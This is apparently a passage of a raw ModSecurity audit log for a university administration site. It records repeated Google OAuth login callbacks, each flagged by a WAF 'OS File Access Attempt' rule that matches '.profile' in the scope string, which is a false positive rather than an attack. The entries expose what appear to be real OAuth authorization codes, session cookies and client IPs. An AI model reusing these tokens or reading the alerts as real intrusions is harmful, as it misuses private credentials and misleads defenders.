gzip, deflate, br accept-language: en-US,en;q=0.9 cookie: PHPSESSID=td765jvkfb16ji7bo8for51cp7 --3a259347-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --3a259347-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHkc1ooLYw4or2LgWJSdwAAANM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343091372199 328419 (- - -) Stopwatch2: 1753343091372199 328419; combined=4939, p1=552, p2=3976, p3=184, p4=65, p5=161, sr=136, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a259347-Z-- --2a911205-A-- [24/Jul/2025:10:45:08.789353 +0300] aIHkhFooLYw4or2LgWJSrQAAANM 212.28.242.186 46546 127.0.0.1 7081 --2a911205-B-- GET /administration/index.php?code=4/0AVMBsJhBRHKZA70CtETfUxkxyRHqjyp_IEVBy8sz9C1DaqJjvjg2DFs1rSGExve7SxX4yw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=21bpo7shvcragcdcm1a0pbtd05 --2a911205-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --2a911205-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHkhFooLYw4or2LgWJSrQAAANM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343108341344 448217 (- - -) Stopwatch2: 1753343108341344 448217; combined=4499, p1=629, p2=3512, p3=154, p4=57, p5=147, sr=186, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2a911205-Z-- --a390e024-A-- [24/Jul/2025:10:47:19.214653 +0300] aIHlBhukk8cgt8UnU9pPuAAAAFg 212.28.242.186 53172 127.0.0.1 7081 --a390e024-B-- GET /administration/index.php?code=4/0AVMBsJip9bkpriPaEyQTi0jHMKhkoq_hjgW34L6v-yM8mo8oBozUC5gjl1A21q86j8b0Mg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=sqsemh12av2d8sbrpe98511au5 --a390e024-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --a390e024-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHlBhukk8cgt8UnU9pPuAAAAFg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343238781964 432898 (- - -) Stopwatch2: 1753343238781964 432898; combined=11273, p1=978, p2=9897, p3=137, p4=67, p5=193, sr=391, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a390e024-Z-- --2ed5fc38-A-- [24/Jul/2025:10:47:39.616198 +0300] aIHlG1ooLYw4or2LgWJVOgAAANY 212.28.242.186 36376 127.0.0.1 7081 --2ed5fc38-B-- GET /administration/index.php?code=4/0AVMBsJhmd9AGRRWVwcFwZipq72dGuJKPFPvHXctqqwn8Zh45r-94IHXwkOcwOXCwb18MCw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=a97e6ndlc7hl54r1a3pf99sgd0 --2ed5fc38-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --2ed5fc38-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHlG1ooLYw4or2LgWJVOgAAANY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343259179338 437000 (- - -) Stopwatch2: 1753343259179338 437000; combined=5411, p1=764, p2=4353, p3=122, p4=60, p5=111, sr=207, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2ed5fc38-Z-- --f04eb523-A-- [24/Jul/2025:10:47:57.497430 +0300] aIHlLVooLYw4or2LgWJVpwAAAMY 212.28.242.186 55262 127.0.0.1 7081 --f04eb523-B-- GET /administration/index.php?code=4/0AVMBsJiY3CvCrqmww8XgfNCh_p91AmFHxNg8FsNm-Z8GqbVqlIGMm3ANZqdKGl5rGu8ZuQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=fr1890e3ibv2l929so76d06k05 --f04eb523-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --f04eb523-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHlLVooLYw4or2LgWJVpwAAAMY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343277068468 429164 (- - -) Stopwatch2: 1753343277068468 429164; combined=4781, p1=856, p2=3599, p3=126, p4=62, p5=137, sr=281, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f04eb523-Z-- --1076fb00-A-- [24/Jul/2025:10:48:28.443811 +0300] aIHlSxukk8cgt8UnU9pQ4AAAAFg 141.105.87.197 47438 127.0.0.1 7081 --1076fb00-B-- GET /administration/index.php?code=4/0AVMBsJi-Yo2XCe9UxnuKVBya4cifClzXeRQcEytArhzeLzCbXxJ3FgVt4iUOqXuTXh6Krw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=0cks2agr4hamlumcv2616npn63 --1076fb00-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --1076fb00-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHlSxukk8cgt8UnU9pQ4AAAAFg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343307981736 462291 (- - -) Stopwatch2: 1753343307981736 462291; combined=9345, p1=559, p2=8356, p3=156, p4=82, p5=191, sr=156, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1076fb00-Z-- --dd36666a-A-- [24/Jul/2025:10:50:49.785441 +0300] aIHl2VooLYw4or2LgWJZhwAAANg 195.112.198.68 50028 127.0.0.1 7081 --dd36666a-B-- GET /administration/index.php?code=4/0AVMBsJhD-PFl_zSUcQmQpApm-KSepsQE0eD_6tRcpevB_2Q9PDi75Thdq1y7W-Nm7a8fsg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=cbm1oakl0f868ouoiisu0ahph4 --dd36666a-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --dd36666a-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHl2VooLYw4or2LgWJZhwAAANg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343449372680 412918 (- - -) Stopwatch2: 1753343449372680 412918; combined=5309, p1=754, p2=4287, p3=92, p4=64, p5=112, sr=197, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dd36666a-Z-- --7f5b1636-A-- [24/Jul/2025:10:51:24.581749 +0300] aIHl_FooLYw4or2LgWJaugAAAM4 212.28.242.186 60354 127.0.0.1 7081 --7f5b1636-B-- GET /administration/index.php?code=4/0AVMBsJiEprSMjc87XRsyVUXIdndBbh1nGWqlDCLwb0UtqUFh1O6O0fld6wUZ-k8lUUMiKw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=i5fcc9286nhc2a08o9eamm2nr7 --7f5b1636-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --7f5b1636-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHl_FooLYw4or2LgWJaugAAAM4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343484166324 415632 (- - -) Stopwatch2: 1753343484166324 415632; combined=5438, p1=548, p2=4426, p3=192, p4=59, p5=213, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7f5b1636-Z-- --722d2526-A-- [24/Jul/2025:10:52:00.861697 +0300] aIHmIEdutIOpb_kg22i7awAAABY 141.105.87.197 35932 127.0.0.1 7081 --722d2526-B-- GET 